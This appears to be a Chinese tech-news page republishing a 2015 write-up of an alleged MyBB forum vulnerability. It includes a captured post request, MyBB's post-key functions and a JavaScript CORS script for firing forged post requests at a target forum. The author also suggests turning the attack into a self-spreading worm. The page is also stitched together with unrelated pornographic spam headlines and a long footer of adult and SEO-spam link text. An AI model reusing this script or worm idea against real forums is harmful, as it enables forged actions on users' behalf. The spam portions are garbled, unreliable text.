99久久伊人-99久久综合-99久久综合给久久精品-99久久综合狠狠综合久久男同-男人j桶进女人j的视频-男人j桶进女人免费视频

299

知名論壇系統(tǒng)MyBB被爆0day漏洞

時間: 2015-08-31 10:26:28   點擊數(shù): 38282   來源: 耐思智慧

MyBB是國際上非常優(yōu)秀的免費論壇軟件,最大的特色是簡單但是功能卻出奇的強大。支持多國語言,可以分別設(shè)置前臺后臺的語言,每個用戶都可以設(shè)置自己使用何種語言訪問論壇包括自己的時區(qū)等,自定義功能強大到?jīng)]有做不到只有想不到。

漏洞影響多個版本

本次影響版本:1.6x & 1.8x
測試版本:1.8.3 (最新), 以及1.6.16 (1.6系列最新)

正是因為其強大影響力,我便開始肆意玩耍MyBB以及監(jiān)控請求,在此期間我注意到一些極有可能導致漏洞出現(xiàn)的東西,這些都已經(jīng)在多個站點上進行了測試。

測試過程

首先損壞MyBB很簡單。當你去發(fā)布一個新的帖子,在提交時它會請求一些東西,以下為來自Hackforums論壇post請求的示例:

POST http://www.hackforums.net/newreply.php?tid=4602700&processed=1 HTTP/1.1
Host: www.hackforums.net
User-Agent: Mozilla/5.0 (Windows NT 5.3; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.hackforums.net/newreply.php?tid=4602700
Cookie: *
Connection: keep-alive
Content-Type: multipart/form-data; boundary=------71842462512788
Content-Length: 1588
------71842462512788
Content-Disposition: form-data; name="my_post_key"
******
------71842462512788
Content-Disposition: form-data; name="message_new"
Hey dude, I love your site Omni. Can I get a free upgrade?
------71842462512788
Content-Disposition: form-data; name="message"
Hey dude, I love your site Omni. Can I get a free upgrade?
------71842462512788
Content-Disposition: form-data; name="submit"
Post Reply
------71842462512788
Content-Disposition: form-data; name="action"
do_newreply
------71842462512788
Content-Disposition: form-data; name="replyto"
------71842462512788
Content-Disposition: form-data; name="posthash"
******
------71842462512788
Content-Disposition: form-data; name="attachmentaid"
------71842462512788
Content-Disposition: form-data; name="attachmentact"
------71842462512788
Content-Disposition: form-data; name="subject"
*
------71842462512788
Content-Disposition: form-data; name="quoted_ids"
------71842462512788
Content-Disposition: form-data; name="tid"
4602700
------71842462512788--

對于MyBB這個系統(tǒng)我們已經(jīng)了解它的一些字段了,其中第一個就是post key,如果沒有這個字段,我們就不能發(fā)送任何帖子。獲取這個key十分簡單,稍后我們會進行詳細解釋。現(xiàn)在我們需要獲取的是posthash,posthash僅僅只是一個MD5字符串,只需創(chuàng)建一個有效的MD5字符串就可以繞過它。我可以告訴你這是因為占位符的原因,但是深究其內(nèi)在不是我們今天要討論的問題。

盯著message_new和message字段,MyBB會提交這兩個字段,然而它僅顯示message字段中的內(nèi)容,而不會顯示message_new字段中的內(nèi)容。所以你可以在之前的帖子message_new字段中寫入cocks,當然你無法從帖子中看出與之前有什么不同。

如何生成post key

post key會依賴以下函數(shù):

function generate_post_check() {     global $mybb, $session;     if($mybb->user['uid'])     {         return md5($mybb->user['loginkey'].$mybb->user['salt'].$mybb->user['regdate']);     }     // Guests get a special string     else     {         return md5($session->useragent.$mybb->config['database']['username'].$mybb->settings['internal']['encryption_key']);     } }

接著驗證post key是否調(diào)用該函數(shù):

function verify_post_check($code, $silent=false) {     global $lang;     if(generate_post_check() != $code)     {         if($silent == true)         {             return false;         }         else         {             if(defined("IN_ADMINCP"))             {                 return false;             }             else             {                 error($lang->invalid_post_code);             }         }     }     else     {         return true;     } }

然后我們會看到它在查找loginkey, salt, regdate信息。現(xiàn)在我們獲取這些信息是相當?shù)娜菀祝ㄎ也幌脒^多解釋,這個確實太容易了)一旦獲得post key,只要其是可用的并且用戶還未更改密碼(目前大多數(shù)論壇用戶很少有經(jīng)常修改密碼的習慣)。

好了,這就開始我們的攻擊。首先我們需要確定一個攻擊目標(我在本機上搭建了一個站點),接著我寫了一個CORS腳本,然后用戶通過瀏覽器點擊一個用來請求帖子內(nèi)容的URL,URL在另一端獲取到請求后,進行處理但是不會進行消息提示。假設(shè)你構(gòu)造了一個合法的請求,你將會看到網(wǎng)頁的變化。

如何使用

基于不同的需求,可以構(gòu)造不同的請求。這可用于提交帖子,獲取論壇榮譽點等。如果你想把這個漏洞搞的像是蠕蟲病毒一般,只需每個訪問到帖子的人都在這個帖子下面繼續(xù)回復(這個需要把更多的精力放在獲取post key上),說實話這種可能非常高!

CORS代碼

注意:這只是來自appsec-labs的示例代碼,你需要進行一些修改以適合你的攻擊目標:

// I suggest adding jQuery to top of file // You will have to modify the code to make it more useable as I won't be modifying it for you. var url = 'http://forum.mytarget.com/'; $(document).ready(function() {      corsMyBBPost(); }); function corsMyBBPost() {     for(i=0; i<times; i++)     {         cors_send("post", url + "?proof_of_concept=1&req_num=" + i, "post=data", false);     } } function cors_send(method, url, data, credentials) {     var cors;     if (window.XDomainRequest)     {         cors = new XDomainRequest();         if (cors)         {             cors.onprogress = function() { CORSstatus("Process") };             cors.onload = function() { CORSresult(cors.responseText) };         }         else             CORSstatus("Browser does not support Cross Origin Request");     }     else if (window.XMLHttpRequest)     {         cors = new XMLHttpRequest();         cors.onreadystatechange = function() {             if (cors.readyState == 4)                 CORSresult(cors.getAllResponseHeaders(), cors.responseText);             else                 CORSstatus("Process");             }     }     else     {         CORSstatus("Browser does not support AJAX");     }     method = method.toUpperCase();     if (method == "POST" || method == "PUT")         cors.open(method, url, data);     else         cors.open(method, url);     if (credentials)         cors.withCredentials = "true";     cors.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");     cors.send(data);     CORSstatus("Cross Origin Resource Sharing - Start"); } function CORSstatus(msg) {      console.log(msg); } function CORSerror(msg) {      console.log("Oh shit..." + msg); }

不加任何修飾,這代碼十分簡潔。在此我不會描述如何盜取post key的方法,如果你自己有何領(lǐng)悟那是你自己的事情。

最后,希望大家能夠從中多學多一些東西。

上一篇:中小企業(yè)制作網(wǎng)站的技巧 下一篇:注冊微信公眾號選服務號還是訂閱號?

旗下網(wǎng)站:耐思智慧 - 淘域網(wǎng) - 我的400電話 - 中文域名:耐思尼克.cn 耐思尼克.top

耐思智慧 © 版權(quán)所有 Copyright © 2000-2025 IISP.COM,Inc. All rights reserved

備案號碼: 粵ICP備09063828號  公安備案號: 公安備案 粵公網(wǎng)安備 44049002000123號  域名注冊服務機構(gòu)許可:粵D3.1-20240003 CN域名代理自深圳萬維網(wǎng)

聲明:本網(wǎng)站中所使用到的其他各種版權(quán)內(nèi)容,包括但不限于文章、圖片、視頻、音頻、字體等內(nèi)容版權(quán)歸原作者所有,如權(quán)利所有人發(fā)現(xiàn),請及時告知,以便我們刪除版權(quán)內(nèi)容

本站程序界面、源代碼受相關(guān)法律保護, 未經(jīng)授權(quán), 嚴禁使用; 耐思智慧 © 為我公司注冊商標, 未經(jīng)授權(quán), 嚴禁使用

法律顧問:珠海知名律師 廣東篤行律師事務所 夏天風 律師

主站蜘蛛池模板: 黄色小视频在线免费观看 | 黄色中文字幕在线观看 | 操你啦在线视频 | 黄漫无遮挡免费网站3d | 欧美大片va欧美在线播放 | 国产a区| 成年美女黄网站色大片免费看 | 日本欧美一区二区三区在线观看 | 国产福利午夜波多野结衣 | 成年人在线观看免费视频 | 国产毛片一级国语版 | 深夜福利网站 | 日本一区二区三区高清福利视频 | 黄频大全 | 成人影视频 | 国产人成久久久精品 | 亚洲精品123区 | 日日干日日射 | 波多野结衣一区二区三区在线观看 | 真实国产精品视频国产网 | 国产亚洲青色国产 | 国产人免费人成免费视频 | 国产一级第一级毛片 | 中文字幕在线成人免费看 | 日日操日日摸 | 欧美一级性 | 欧美日韩国产在线 | 成人亚洲性情网站www在线观看 | 激情 黄 +色+成+人 | 日本精品一区二区三区在线观看 | caopren免费视频国产 | 成人欧美在线观看 | 欧美高清视频手机在在线 | 99久久中文字幕伊人 | 一级毛片免费在线 | 欧美精品99 | 亚洲丰满熟妇毛片在线播放 | 欧美三级大片在线观看 | 午夜三级福利 | 又黄又爽又色的视频 | 国产苐1页影院草草影院 |